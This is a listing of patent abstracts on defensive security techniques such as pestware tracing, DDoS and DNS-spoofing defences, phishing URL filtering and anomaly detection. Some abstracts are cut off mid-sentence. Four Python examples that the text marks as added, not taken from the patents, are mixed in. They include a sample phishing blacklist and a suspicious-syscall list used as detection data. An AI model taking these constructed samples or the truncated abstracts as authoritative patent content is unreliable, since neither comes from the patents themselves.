20120246722BACKWARDS RESEARCHING ACTIVITY INDICATIVE OF PESTWARE - A system and method for researching an identity of a source of activity that is indicative of pestware is described. In one embodiment the method comprises monitoring, using a kernel-mode driver, API call activity on the computer; storing information related to the API call activity in a log; analyzing, heuristically, the API call activity to determine whether one or more weighted factors associated with the API call activity exceeds a threshold; identifying, based upon the API call activity, a suspected pestware object on the computer; identifying, in response to the identifying the suspected pestware object, a reference to an identity of an externally networked source of the suspected pestware object; and reporting the identity of the externally networked source to an externally networked pestware research entity.09-27-2012
20120246724SYSTEM AND METHOD FOR DETECTING AND DISPLAYING CYBER ATTACKS - A method, system, and computer program product for displaying detected cyber attacks over communications networks, including a radar type display section including one or more icons representing detected cyber attacks; an activity tracking display section including information regarding the detected cyber attacks represented by the icons; and an application information display section including at least one of system user information, session information, and statistics information regarding the cyber attacks.09-27-2012
20100162391Online Risk Mitigation - Online risk mitigation techniques are described. In an implementation, a service is queried for a reputation associated with an object from an online source in response to selection of the object. A backup of a client that is to receive the object is stored prior to obtaining the object when the reputation does not meet a threshold reputation level.06-24-2010
20100162392APPARATUS AND METHOD FOR MONITORING SECURITY STATUS OF WIRELESS NETWORK - An apparatus for monitoring the security status of a wireless network is provided. The apparatus includes a radio frequency (RF) signal collection unit which collects at least one piece of RF signal information; a security event information collection unit which collects security event information including at least one of traffic information and alert information; a security event information mapping unit which maps the RF signal information and the security event information based on the correlation between the RF signal information and the security event information; and a security event information display unit which displays the result of the mapping performed by the security event information mapping unit. Therefore, it is possible to allow a network administrator to intuitively recognize the security status of a wireless network by collecting RF signal information and security event information from the wireless network, mapping the RF signal information and the security event information based on the correlation therebetween and displaying the result of the mapping.06-24-2010
20100263047GROUP INTERCOM, DELAYED PLAYBACK, AND AD-HOC BASED COMMUNICATIONS SYSTEMS AND METHODS - Methods and apparatuses for escalating a problem with a personal communications device in a wireless communications network, each personal communications device having at least one communications session associated therewith, at least one process associated therewith, at least one IP address associated therewith and at least one personal communications device identification associated therewith. A problem is identified with a particular communications session associated with a particular personal communications device. The particular communications session is excluded from the wireless communications network. The device determines if the problem associated with the particular communications session has exceeded a problem threshold. If the problem associated with the particular communications session has exceeded a problem threshold, the exclusion of the particular communications session.10-14-2010
20120304288Modeling and Outlier Detection in Threat Management System Data - Methods, systems, and computer-readable media for identifying potential threats on a network based on anomalous behavior in communication between endpoints are provided. Traffic data for a network is accumulated over some period of time. The traffic data is grouped by one or more keys, such as source IP address, and sets of metric values are calculated for the keys. A mixture distribution, such as a negative binomial mixture distribution, is fitted to each set of metric values, and outlying metric values are determined based on the mixture distribution(s). A list of outliers is then generated comprising key values having outlying metric values in one or more of the sets of metric values.11-29-2012
20120304293SYSTEM AND METHOD FOR DOWNLOADING USER INTERFACE COMPONENTS TO WIRELESS DEVICES - A method of processing a user interface component is provided and includes receiving one or more user interface components that can be communicated to a wireless device. A component risk level for each of the one or more user interface components is determined and assigned to each of the one or more user interface components. Each of the one or more user interface components can be digitally signed using an embedded risk code that indicates the assigned risk level. Further, the component risk level can be selected from a plurality of component risk levels. In a particular embodiment, the component risk level can be determined based on the type of the user interface component. Further, the component risk level can be determined based on a developer of the user interface component.11-29-2012
20100186087PROCESSING PACKET STREAMS - Systems and methods are disclosed that includes a data-bus, system memory, a first processor arranged to receive an input stream, and a second processor programmed to apply one or more security algorithms to secure packets of the input stream to generate at least partially security-processed packets.07-22-2010
20120198550ELECTRONIC TRANSACTION RISK MANAGEMENT - A method of detecting unauthorized activity in an electronic message transfer system comprising a plurality of devices, each device being configured to generate and receive cryptographically secured transfer messages for exchanging content with other devices in the system. In each device, audit information is accumulated in a memory of the device. The device periodically forwards at least part of its accumulated audit information to a secure server.08-02-2012
20100180342Method for Using Extended Security System, Extended Security System and Devices - Embodiments of the present invention disclose a method for using an extended security system, including: configuring one of security processing devices in the extended security system as a primary security processing device and configuring other security processing devices as at least one secondary security processing device connected with the primary security processing device; the method further includes: when the extended security system receives an external packet, selecting, by the primary security processing device, a security processing device to process the received external packet, the selected security processing device being the primary security processing device or the secondary security processing device. The embodiments of the present invention also disclose an extended security system and a primary security processing device and secondary security processing devices. By data interaction between the security processing devices, resource sharing between the security processing devices can be implemented, thereby improving the performance of the extended security system.07-15-2010
20100218250NETWORK MONITORING APPARATUS, NETWORK MONITORING METHOD, AND NETWORK MONITORING PROGRAM - A traffic monitoring system (08-26-2010
20080209553Method for protecting data in a hard disk - The present invention discloses a method for protecting data in a hard disk, such that when a computer executes a power-on self test (POST) of a basic input/output system (BIOS), completes initialization of memories and calls an interrupt routine of the BIOS to read a hard disk area after the initialization program code of the interface devices of all hard disks has been executed, the computer will determine whether or not the hard disk contains protection description data with a portion that matches the computer identification code of the computer before accessing data in the hard disk.08-28-2008
20080209556METHOD AND DEVICE FOR VERIFICATION OF CODE MODULE IN VIRTUAL MACHINE - A method for pre-verification of a code module when the code module is installed or updated in a virtual machine, comprising: loading codes in the installed or updated code module; performing code verification on the codes in the code module; if the code verification is passed, generating a certificate of the code module; and storing the code module passing the code verification and its certificate. The present invention also discloses a method for verification of a code module at runtime of the code module in a virtual machine, comprising loading codes in the code module; generating a certificate of the code module based on the loaded codes; if the generated certificate of the code module and a pre-stored certificate of the code module are identical, verifying the code module to be valid; otherwise performing a pre-verification on the code module.08-28-2008
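The install-time/runtime split described in this abstract (pre-verify, store a certificate of the verified module, and at runtime re-derive the certificate and fall back to pre-verification on mismatch) is easier to see in code. The following is an added example, not code from the patent or from any virtual machine implementation; the verification rule, the VM secret and the module store are constructed assumptions. The certificate is computed as an HMAC over the module bytes with a per-VM secret so that a tampered module cannot simply ship its own matching certificate:

```python
import hashlib
import hmac

# Assumption: a per-VM secret that binds certificates to this VM (not from the patent text).
VM_SECRET = b"example-vm-secret"


def verify_bytecode(code: bytes) -> bool:
    """Stand-in for the patent's 'code verification' step.

    Constructed rule for the example: reject empty modules and modules that contain
    a forbidden opcode marker (0xFF). A real verifier would type-check the bytecode.
    """
    return len(code) > 0 and b"\xff" not in code


def make_certificate(code: bytes) -> str:
    """Certificate of a code module: keyed hash over the module bytes."""
    return hmac.new(VM_SECRET, code, hashlib.sha256).hexdigest()


class ModuleStore:
    """Holds verified modules together with their certificates."""

    def __init__(self) -> None:
        self.modules: dict[str, tuple[bytes, str]] = {}  # name -> (code, certificate)

    def install(self, name: str, code: bytes) -> bool:
        """Pre-verification when a module is installed or updated."""
        if not verify_bytecode(code):
            return False
        self.modules[name] = (code, make_certificate(code))
        return True

    def load_at_runtime(self, name: str, code: bytes) -> str:
        """Runtime verification.

        Returns 'valid' when the recomputed certificate equals the stored one,
        'reverified' when it did not match but the module passed a fresh
        pre-verification (and is stored again), and 'rejected' otherwise.
        """
        stored = self.modules.get(name)
        if stored is not None and hmac.compare_digest(make_certificate(code), stored[1]):
            return "valid"
        # Certificate missing or mismatched: run the pre-verification again.
        if verify_bytecode(code):
            self.modules[name] = (code, make_certificate(code))
            return "reverified"
        return "rejected"
```

Note that a plain unkeyed hash would satisfy the abstract's "generating a certificate based on the loaded codes", but then an attacker who can replace the module can usually also replace the stored certificate; keying the hash with a secret the module store controls closes that gap, which is why the example uses HMAC.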
20090077660Security Module and Method for Controlling and Monitoring the Data Traffic of a Personal Computer - The invention disclosed herein relates to a security module (03-19-2009
20100154055Prefix Domain Matching for Anti-Phishing Pattern Matching - Phishing uniform resource locators are detected and/or filtered. After a uniform resource locator is received, it is determined if at least a portion of a prefix of the uniform resource locator matches at least a portion of a blacklist entry and the uniform resource locator is filtered if at least a portion of the prefix of the uniform resource locator matches at least a portion of the blacklist entry. The prefix of the uniform resource locator is constrained to be a predetermined number of the highest level domain labels of the domain name in the received uniform resource locator.06-17-2010
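To make the prefix constraint in this abstract concrete, here is an added example (not code from the patent) that reduces a URL's host to its N highest-level domain labels and matches that prefix against a blacklist at label boundaries. The blacklist contents, the hostnames and the default of two labels are constructed assumptions. The example also covers two cases a practitioner will hit: userinfo tricks such as `http://bank.com@evil.example/`, where the real host is after the `@`, and IP-literal hosts, which have no domain labels and are compared whole:

```python
import ipaddress
from urllib.parse import urlsplit


def domain_prefix(url: str, labels: int = 2) -> str:
    """Return the `labels` highest-level DNS labels of the URL's host.

    'http://login.example.com/x' with labels=2 -> 'example.com'.
    IP-literal hosts are returned unchanged; an unparsable URL yields ''.
    """
    host = (urlsplit(url).hostname or "").rstrip(".").lower()
    if not host:
        return ""
    try:
        ipaddress.ip_address(host)
        return host  # no domain labels to constrain
    except ValueError:
        pass
    parts = host.split(".")
    return ".".join(parts[-labels:])


def _label_suffix_match(a: str, b: str) -> bool:
    """True if a equals b or one is a label-boundary suffix of the other."""
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def is_phishing(url: str, blacklist: list[str], labels: int = 2) -> bool:
    """Filter a URL if its constrained prefix matches (a portion of) a blacklist entry."""
    prefix = domain_prefix(url, labels)
    if not prefix:
        return False
    return any(_label_suffix_match(prefix, entry.rstrip(".").lower()) for entry in blacklist)


# Constructed sample blacklist for the example.
SAMPLE_BLACKLIST = ["evil.example", "phish.example.co.uk", "203.0.113.7"]
```

Matching at label boundaries matters: a plain substring test would let `notevil.example` match `evil.example`. Choosing `labels` too small (one label) collapses every `.com` site to the same prefix, so the value must be large enough to reach the registrable domain, which for `example.co.uk` means three labels.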
20100242112SYSTEM AND METHOD FOR PROTECTING NETWORK RESOURCES FROM DENIAL OF SERVICE ATTACKS - The present disclosure generally pertains to systems and methods for protecting network resources from denial of service attacks. In one exemplary embodiment, a responder stores an access filter value used to determine whether an incoming message frame has been transmitted from an authorized user. In this regard, a user communication device includes logic for determining the access filter value stored at the responder and includes the access filter value in a message frame transmitted from the computer to the responder. The responder compares the received access filter value to the stored access filter value. If such values match or otherwise correspond, the responder authenticates the message frame. However, if such values do not match or otherwise correspond, the responder discards the message frame. Thus, the responder processes authenticated message frames and discards unauthenticated message frames thereby preventing denial of service attacks from malicious users.09-23-2010
20100218251Detection of Artificially Generated System Load - A system and method are provided for detecting artificially generated load on a search system. The system may include a load monitoring component for monitoring a current load for comparison with an expected load. The system may additionally include an abnormality detection component for detecting an abnormality when the monitored load exceeds an expected amount by a predetermined threshold. The system may further include an analysis component for determining if the monitored load is an artificial load.08-26-2010
20100235908System and Method for Detection of a Change in Behavior in the Use of a Website Through Vector Analysis - A system and method for identifying the change of user behavior on a website includes analyzing the actions of users on a website comprising a plurality of parameters or parameters that identify the actions performed on a website including parameters or fields related to previous actions by that user or other users of the website. The parameters or fields are represented in a vector format where each vector represents a different session of activity on the website, page of the website, user of the website, or other attribute of the use of a website. Analysis is performed to determine if new sessions are similar or dissimilar to previously known sessions.09-16-2010
20100242110Widget Security - A widget security system, method and computer-readable medium detects a security event associated with a widget, assesses the risk associated with the security event, and initiates a security action based on the assessed risk.09-23-2010
20100235910SYSTEMS AND METHODS FOR DETECTING FALSE CODE - Systems and methods for detecting false code in web pages linked to a web site are provided. One system includes a web server for administering the web site and a surveillance server for collecting generated or updated web pages from among the web pages linked to the web site, selecting tags of a given tag type included in the collected web pages, determining whether the selected tags comprise false code, and providing the determination result to an administrator terminal such that an administrator can check the determination result. One method includes collecting web pages that were generated or updated within a set time period from among the web pages linked to the web site, determining whether tags included in the collected web pages comprise false code, and providing the determination result to an administrator terminal such that an administrator can check the determination result.09-16-2010
20100212011METHOD AND SYSTEM FOR SPAM REPORTING BY REFERENCE - Methods and systems for spam reporting by reference are described. In one embodiment, an electronic message may be received by a mobile electronic device. A spam report may be transmitted from the mobile electronic device to a report server. The spam report may notify the report server that the electronic message is spam and include a reference to the electronic message without including the electronic message itself. The reference may be usable to identify the received message.08-19-2010
20100212010SYSTEMS AND METHODS THAT DETECT SENSITIVE DATA LEAKAGES FROM APPLICATIONS - In embodiments, the present invention may be a computer program product embodied in a computer readable medium that, when executing on one or more computers, may select a software application for monitoring, where the selection may be based at least in part on the basis that the software application controls confidential information, and where the software application may be an end-point application, a web application, a cloud application, and the like. The present invention may monitor the software application by determining an output data quantity that may be written from the software application. The output data may then be compared with a predetermined quantity, where the predetermined quantity may be indicative of confidential information being written from the software application.08-19-2010
20100138921Countering Against Distributed Denial-Of-Service (DDOS) Attack Using Content Delivery Network - Method and apparatus for blocking a distributed denial-of-service (DDoS) attack are provided. It is first determined whether a traffic status of an origin server is based on the DDoS attack. When it is determined that the traffic status of the origin server is based on the DDoS attack, a DNS is requested to change an Internet protocol (IP) address of the origin server to the IP address of at least one of plural servers. Accordingly, it is possible to accept a normal service providing request and also to determined and block the DDoS attack. In addition, since a device for determining and blocking the DDoS attack need not be installed in each site or server, it is possible to efficiently determine and block the DDoS attack at reduced cost.06-03-2010
20100251364METHOD AND APPARATUS FOR CLASSIFYING HARMFUL PACKET - A network apparatus and method of classifying received packets based on a predetermined standard are disclosed. The method of classifying received packets in a security system comprises parsing a received packet and extracting a payload from the parsed packet; scanning the payload to check whether or not a predetermined signature code is included in the payload; if it is determined from the result of the scanning that the predetermined signature code is included in the payload, generating a presumptive signature based on information included in the predetermined signature code; and determining whether or not the generated presumptive signature is identical with a signature corresponding to the predetermined signature code, and allocating a classification identifier (ID) to the received packet according to the result of the determination, thereby classifying the received packet according to the classification ID, wherein the predetermined signature code is formed by a part of the signature corresponding to the signature code. Accordingly, possibly harmful packets such as attack packets can be classified at high speed and thereby blocked immediately.09-30-2010
20100251363MODIFIED FILE TRACKING ON VIRTUAL MACHINES - In embodiments of the present invention improved capabilities are described for tracking modified files on a virtual machine including the steps of identifying an altered disk sector, associating the altered disk sector with code that is operated in a virtual machine, and causing a malicious code scan to be performed on the code.09-30-2010
20100251362DYNAMIC SPAM VIEW SETTINGS - A method of displaying email messages to a user is provided. Spam classification information and meta data is associated with email messages received for a user. Email message summary information is displayed in a user interface based on whether the meta data associated with the message meets or exceeds a threshold display level for the summary information. The user provides input via the user interface which is an indication to change the threshold display level and the change is dynamically displayed.09-30-2010
20090249480MINING USER BEHAVIOR DATA FOR IP ADDRESS SPACE INTELLIGENCE - The claimed subject matter is directed to mining user behavior data for increasing Internet Protocol (“IP”) space intelligence. Specifically, the claimed subject matter provides a method and system of mining user behavior within an IP address space and the application of the IP address space intelligence derived from the mined user behavior.10-01-2009
20100125909MONITOR DEVICE, MONITORING METHOD AND COMPUTER PROGRAM PRODUCT THEREOF FOR HARDWARE - A monitor device, a monitor method and a computer program product thereof for hardware are disclosed. The hardware comprises a central processing unit (CPU) and a storage module. The monitor device comprises a retrieval module and an analysis module. The retrieval module is configured to retrieve the entry point information of a process before the process is executed, wherein the process comprises at least one instruction from the hardware. The analysis module is configured to retrieve an address corresponding to the process according to the entry point information. When the CPU executes the at least one instruction, the storage module records the at least one instruction according to the address.05-20-2010
20100050256METHODS AND SYSTEMS FOR INTERNET PROTOCOL (IP) PACKET HEADER COLLECTION AND STORAGE - A computer-based method for providing information about a potential security incident ascertained from received internet protocol (IP) packets is described. The method includes capturing IP packets from a computer network, stripping packet header data from the captured IP packets, reviewing the stripped packet header data for multiple occurrences of matching packet header data, and storing, in a database, only a single instance of packet header data for any reviewed packet header data that is determined to have occurred multiple times.02-25-2010
20100050255DETECTION AND SUPPRESSION OF SHORT MESSAGE SERVICE DENIAL OF SERVICE ATTACKS - A method, system, and medium are provided for suppressing a Short Message Service (SMS) induced Denial of Service (DoS) attack on a telecommunications network. A register is updated to include information relevant to SMS messages that are requested to be communicated by way of a wireless telecommunications network. The register includes information of the location where the target devices of SMS messages are located. The register is utilized to detect an SMS induced DoS attack. A trigger is communicated to an SMS router to enable a DoS mode that restricts the communication of SMS messages. In an exemplary embodiment, only those SMS messages identified as part of the DoS attack are restricted.02-25-2010
20100138920METHOD AND SYSTEM FOR DETECTING AND RESPONDING TO HARMFUL TRAFFIC - There is provided a method and system for detecting and responding to harmful traffic. The system includes a router determining whether or not received data is harmful traffic, by using a dynamic flow identification (DFI) function and a deep packet inspection (DPI) function, sending Cflowd information of the received data, and then encapsulating the received data when the received data is determined to be harmful traffic, a policy & resource control entity receiving the Cflowd information from the router, determining whether or not the received data is harmful traffic by using the received Cflowd information, and then sending a result of the determination to the router, and a security management server receiving the encapsulated data from the router, reconfirming whether or not the encapsulated data is harmful traffic, and then processing the encapsulated data.06-03-2010
20100083377METHOD AND APPARATUS TO DEFINE THE SCOPE OF A SEARCH FOR INFORMATION FROM A TABULAR DATA SOURCE - A method and apparatus for defining the scope of a search is described. In one embodiment, user input is received, and the scope is defined, based on the user input, for a search of free-form text for information from any random rows within a tabular structure of source data. In one embodiment, the search is intended for finding, in the free-form text, a sub-set of data fragments that matches information from any single row within the tabular structure of the source data.04-01-2010
20110113489SYSTEM AND METHOD FOR MITIGATING A DENIAL OF SERVICE ATTACK IN A SUBSCRIBER NETWORK - A system and method for mitigating a denial of service attack in a subscriber network. A traffic monitor monitors bandwidth usage of a subscriber network that is directed to a particular port. The traffic monitor detects excessive traffic based on preset thresholds or algorithms. When excessive traffic is detected, the traffic monitor may obtain the source IP address from headers in the packet stream and identify the device or devices from which the packets were delivered to the network. Using the IP addresses of affected devices, a policy may be implemented to throttle packets originating from those devices that are directed to the particular port.05-12-2011
20130219492SYSTEM FOR FINDING CODE IN A DATA FLOW - A code finder system deployed as a software module, a web service or as part of a larger security system, identifies and processes well-formed code sequences. For a data flow that is expected to be free of executable or interpreted code, or free of one or more known styles of executable or interpreted code, the code finder system can protect participants in the communications network. Examples of payload carried by data flows that can be monitored include, but are not limited to, user input data provided as part of interacting with a web application, data files or entities, such as images or videos, and user input data provided as part of interacting with a desktop application.08-22-2013
20100077477AUTOMATIC MANAGING SYSTEM AND METHOD FOR INTEGRITY REFERENCE MANIFEST - The present invention relates to a system for automatically managing integrity reference information and a method of managing the same. The system includes one or more systems, a system management server, and an integrity management server. The systems are connected over a network and communication with each other. Each of the systems has an integrity measurement program to generate integrity information. The system management server has registration information about each of the systems connected over the network and registration information about a program distributed to each of the systems. Further, the system management server controls network access by each of the systems. If integrity reference information matching integrity information provided from a specific system does not exist in pieces of integrity reference information for verifying integrity of each of the systems, the integrity management server determines whether to register the integrity information as integrity reference information of the specific system depending on whether the specific system has been registered with the system management server.03-25-2010
20120144484METHODS, MEDIA, AND SYSTEMS FOR DETECTING AN ANOMALOUS SEQUENCE OF FUNCTION CALLS - Methods, media, and systems for detecting an anomalous sequence of function calls are provided. The methods can include compressing a sequence of function calls made by the execution of a program using a compression model; and determining the presence of an anomalous sequence of function calls in the sequence of function calls based on the extent to which the sequence of function calls is compressed. The methods can further include executing at least one known program; observing at least one sequence of function calls made by the execution of the at least one known program; assigning each type of function call in the at least one sequence of function calls made by the at least one known program a unique identifier; and creating at least part of the compression model by recording at least one sequence of unique identifiers.06-07-2012
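The compression-based detector in this abstract can be built from the standard zlib preset-dictionary mechanism, which is what the following added example does (example code, not the patent holder's implementation). Each function-call type is mapped to a one-byte identifier, the identifier sequences of known programs are concatenated into a zlib preset dictionary (the "compression model"), and a new sequence is judged by how well it compresses against that dictionary. The call names, the trace data and the 0.3 ratio threshold are constructed assumptions:

```python
import random
import zlib


class CallSequenceModel:
    """Compression model built from function-call sequences of known programs."""

    def __init__(self) -> None:
        self.ids: dict[str, int] = {}  # call type -> unique 1-byte identifier
        self.dictionary = b""          # identifier sequences of known programs

    def _encode(self, calls: list[str]) -> bytes:
        """Map call names to identifiers; unseen names get a fresh identifier."""
        out = bytearray()
        for name in calls:
            if name not in self.ids:
                if len(self.ids) >= 255:
                    raise ValueError("more than 255 call types; widen the identifier")
                self.ids[name] = len(self.ids) + 1
            out.append(self.ids[name])
        return bytes(out)

    def train(self, known_sequences: list[list[str]]) -> None:
        for seq in known_sequences:
            self.dictionary += self._encode(seq)
        self.dictionary = self.dictionary[-32768:]  # zlib's window is 32 KiB

    def compression_ratio(self, calls: list[str]) -> float:
        """compressed size / raw size; small means 'looks like the known programs'."""
        data = self._encode(calls)
        if not data:
            return 0.0
        kwargs = {"zdict": self.dictionary} if self.dictionary else {}
        comp = zlib.compressobj(level=9, **kwargs)
        compressed = comp.compress(data) + comp.flush()
        return len(compressed) / len(data)

    def is_anomalous(self, calls: list[str], threshold: float = 0.3) -> bool:
        return self.compression_ratio(calls) > threshold


# Constructed trace of a known-good network program (assumption, not real data).
NORMAL = ["socket", "setsockopt", "bind", "listen", "accept",
          "recv", "send", "send", "recv", "shutdown", "close"]


def build_model() -> CallSequenceModel:
    model = CallSequenceModel()
    model.train([NORMAL * 50])
    return model


def sample_anomalous(n: int = 200, seed: int = 1) -> list[str]:
    """Constructed anomaly: known calls in random order mixed with never-seen calls."""
    rng = random.Random(seed)
    names = sorted(set(NORMAL)) + ["mprotect", "mmap", "execve", "ptrace"]
    return [rng.choice(names) for _ in range(n)]
```

The ratio includes zlib's fixed stream overhead, so very short sequences compress poorly regardless of content; in practice the threshold is calibrated on held-out traces of the known programs, and the identifier table should be frozen after training so that scoring cannot grow it without bound.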
20120144481HOST IP REPUTATION - Various embodiments described above are directed to identifying abuse-hosting services at their source, rather than using such intermediaries as URLs and associated domains. In one or more embodiments, threats can be blocked by using the Internet protocol (IP) address of an identified attacker that is hosting content associated with abuse.06-07-2012
20090271862DETERMINING THE DEGREE OF RELEVANCE OF DUPLICATE ALERTS IN AN ENTITY RESOLUTION SYSTEM - An entity resolution system and alert analysis system configured to process inbound identity records and to generate alerts based on relevant identities, entities, conditions, activities, or events is disclosed. One process of resolving identity records and detecting relationships between entities may be performed using a pre-determined or configurable entity resolution rules. Further, the entity resolution system may include an alert analysis system configured to allow analysts to review and analyze alerts, entities, and identities, as well as provide comments or assign a disposition to alerts generated by the entity resolution system. Furthermore, the entity resolution system may be configured to handle duplicate alerts, i.e., one or more identical or near-identical alerts generated using the same entities and/or identities as well as assign a relevance score to the particular entities and identities included in the alert.10-29-2009
20100263045SYSTEM FOR RECLASSIFICATION OF ELECTRONIC MESSAGES IN A SPAM FILTERING SYSTEM - A method for indicating probability of spam for email comprises tracking network traffic characteristics for the email, and comparing the tracked characteristics for the email to characteristics for email from trusted or known spam sources.10-14-2010
20110067104METHOD OF SECURING EXECUTION OF A PROGRAM - A method of securing execution of a main program that implements nested functions, the method comprising the steps of executing a security management program arranged to update a list of current functions, informing the security management program of the beginning of execution of each function of the main program and updating the list of current functions, informing the security management program of the end of execution of each function, and, after being informed of each end of execution of a function, verifying that the function is indeed the function that was begun the most recently.03-17-2011
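The check this abstract describes is a stack discipline: every function end reported to the security management program must name the function that was begun most recently. The following added example (not the patent's code) keeps that list of current functions and replays a begin/end trace against it; the function names and the two traces are constructed, and the final "nothing left running" check is an addition beyond the abstract:

```python
class NestingGuard:
    """Security management program: the list of functions currently executing."""

    def __init__(self) -> None:
        self.current: list[str] = []

    def notify_begin(self, fn: str) -> None:
        """Main program reports that execution of `fn` has begun."""
        self.current.append(fn)

    def notify_end(self, fn: str) -> None:
        """Main program reports that `fn` has ended; it must be the most recent begin."""
        expected = self.current[-1] if self.current else None
        if expected != fn:
            raise RuntimeError(f"control-flow violation: end of {fn!r}, expected {expected!r}")
        self.current.pop()


def replay(events: list[tuple[str, str]]) -> bool:
    """Feed ('begin'|'end', function) events to a guard; True if the trace is consistent."""
    guard = NestingGuard()
    try:
        for kind, fn in events:
            if kind == "begin":
                guard.notify_begin(fn)
            elif kind == "end":
                guard.notify_end(fn)
            else:
                raise ValueError(f"unknown event {kind!r}")
    except RuntimeError:
        return False
    # Added check: at program exit nothing may still be marked as executing.
    return not guard.current


# Constructed traces for the example.
GOOD_TRACE = [("begin", "main"), ("begin", "authenticate"), ("begin", "check_pin"),
              ("end", "check_pin"), ("end", "authenticate"), ("end", "main")]
# check_pin's end never arrives (e.g. its epilogue was skipped), so authenticate
# reports its end while check_pin is still the most recent function.
SKIPPED_TRACE = [("begin", "main"), ("begin", "authenticate"), ("begin", "check_pin"),
                 ("end", "authenticate"), ("end", "main")]
```

Recursion is handled naturally, since the same name is pushed once per activation. The guard only sees what the instrumented program reports, so in the smart-card setting this abstract targets the begin/end notifications themselves are placed where a fault or glitch that skips the function body would also skip the matching end.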
20110067103ROUTER FOR PREVENTING PORT SCANS AND METHOD UTILIZING THE SAME - A router and method for preventing port scans using a router includes receiving a datagram from a remote computer, transferring the datagram to a local computer, and receiving a response datagram from the local computer. The router and method further include dropping the response datagram if the response datagram is an Internet Control Message Protocol (ICMP) port unreachable datagram and the ICMP port unreachable datagram is abnormal, and recording a port scan event of the remote computer into the log system.03-17-2011
20110067102Outgoing email check system, check data providing apparatus, check data inspecting apparatus, and outgoing email check method - To allow inspecting whether a security check of a planned outgoing email is finished in an outgoing email check system, a check data providing apparatus 03-17-2011
20110067101Individualized Time-to-Live for Reputation Scores of Computer Files - An individualized time-to-live (TTL) is determined for a reputation score of a computer file. The TTL is determined based on the reputation score and the confidence in the reputation score. The confidence can be determined based on attributes such as the reputation score, an age of the file, and a prevalence of the file. The reputation score is used to determine whether the file is malicious during a validity period defined by the TTL, and discarded thereafter.03-17-2011
20090222919METHOD AND SYSTEM FOR CONTENT CATEGORIZATION - The invention discloses a method and system for content categorization, which aims at reducing the processing burden of the content categorization as well as the network transmission traffic. The method comprises: transmitting, by a content categorization requester, a content digest of a content to be categorized to a content categorization provider; and performing, by the content categorization provider, content categorization according to the content digest. The device for requesting content categorization comprises: a digest operation determination component, adapted to determine whether it is necessary to obtain a content digest of a content to be categorized; a digest obtaining component, adapted to obtain the content digest of the content to be categorized when the digest operation determination component determines it necessary to obtain the content digest of the content to be categorized; and a first transmit component, adapted to transmit the content digest obtained by the digest obtaining component.09-03-2009
20080313732Preventing the theft of protected items of user data in computer controlled communication networks by intruders posing as trusted network sites - Protected items of user data are protected from intrusion and theft, e.g. phishing, by maintaining a first listing, associated with a user display terminal, of protected user data items, and maintaining a second listing, associated with the display terminal, of the addresses of trusted network sites to which each of said protected user data items may be transmitted. When a transmission of a protected item from the user display terminal to a selected non-trusted network site is initiated, as determined by comparison of the two lists, the user is alerted to the proposed transmission to a non-trusted site. The transmission is prohibited until the user decides either to cancel or to proceed with the transmission.12-18-2008
20100269174SYSTEMS AND METHODS FOR GENERATING A DNS QUERY TO IMPROVE RESISTANCE AGAINST A DNS ATTACK - The present solution provides systems and methods for generating DNS queries that are more resistant to being compromised by attackers. To generate the transaction identifier, the DNS resolver uses a cryptographic hash function. The inputs to the hash function may include a predetermined random number, the destination IP address of the name server to be queried, and the domain name to be queried. Because of the inclusion of the name server's IP address in the formula, queries for the same domain name to different name servers may have different transaction identifiers, preventing an attacker from observing a query and predicting the identifiers for other queries. Additional entropy may be provided for generating transaction identifiers by including the port number of the name server and/or a portion of the domain name as inputs to the hash function. If it is determined that the responding server may preserve capitalization in its responses, the upper and lower case characters may be salted within the domain name to provide additional entropy in generating transaction identifiers.10-21-2010
20090320129SECURE CONTROL FLOWS BY MONITORING CONTROL TRANSFERS - A cross-module detection system and method for detecting and monitoring control flow transfers between software modules in a computer system. The system and method detect and monitor control flows entering and exiting the software modules. For a particular module, a checking model is extracted from the binary file of that module. In addition, a relaxed shadow stack is generated. If the module is an original module, meaning that the control flow originated from that module, then the checking model is used to check the validity of the control flow transfer. Otherwise, the relaxed shadow stack is used. An interception module is used to intercept and terminate invalid control flow transfers. If an invalid control flow transfer is detected, then the transfer is terminated. Otherwise, the control flow transfer is allowed to continue.12-24-2009
20090320128SYSTEM MANAGEMENT INTERRUPT (SMI) SECURITY - A system management interrupt (SMI) security system includes one or more subsystems to define a first variable using advanced configuration and power interface (ACPI) source language (ASL) code, define a second variable using system management mode (SMM) code, generate a first soft SMI to generate a random value, update the first and second variables with the generated value, generate a second SMI to perform an operation, compare the values of the first and second variables and perform the operation in response to the first and second variables having a value substantially the same as one another.12-24-2009
20090165134Look ahead of links/alter links - A computationally-implemented method comprising retrieving at least a portion of data from a data source, determining an effect of the data, determining an acceptability of the effect of the data at least in part via a virtual machine representation of at least a part of a real machine having one or more end-user specified preferences and providing at least one data display option based on the determining acceptability of the effect of the data.06-25-2009
20090144824Integrated Protection Service Configured to Protect Minors - An integrated system configured to provide a safe environment for a minor is described. The system includes a training segment, a set-up segment, and a consulting segment. The training segment is configured to train parents and/or guardians of minors about dangers including those involving the internet. The set-up system is configured to help the parents or guardians establish tracking of the minor's internet activity. The consulting segment is configured to providing initial and ongoing consulting regarding particular threats or concerns associated with safety of the minor.06-04-2009
20090113546MEMORY SYSTEM FOR SENSING ATTACK - A memory system includes a main memory, a sub-memory, a controller, first and second data readers and a comparator. The main memory stores data and the sub-memory stores data extracted from the data stored in the main memory for detection of an attack. The controller controls operations of the memory system through interfacing with a host. The first data reader is configured to read first data from the main memory based on address information from the controller. The second data reader is configured to store information relating to second data stored in the sub-memory and to read the second data from the sub-memory based on address information from the controller which is the same as the address information received by the first data reader. The comparator compares the first data read by the first data reader with the second data read by the second data reader to detect the attack.04-30-2009
20090113545Method and System for Tracking and Filtering Multimedia Data on a Network - The method for identifying and filtering multimedia data consists of monitoring off-line, on a data transmission network, multimedia data with reference to reference multimedia data and using an on-line intervention module to intercept, query or listen to the multimedia data recognized on-line using formal data stored in a formal activation database generated during off-line monitoring using suspicious data obtained during a search for multimedia data on the network.04-30-2009
20100223668APPARATUS AND METHOD FOR MANAGING TERMINAL USERS - The present invention relates to an apparatus and method of managing terminal users that is capable of securely managing personal information and data of a user in a mobile terminal. An embodiment of the present invention provides an apparatus and method of managing terminal users that monitors whether a terminal of a user is abnormally used, including whether the terminal is not used over a predetermined period of time, to collect and check data, and, when it is determined that the terminal is abnormally used as a checked result, forces the user to log out. Therefore, a login situation of the user can be accurately recognized, and the internal operation of the terminal can be secured from external users to securely manage user data and improve security.09-02-2010
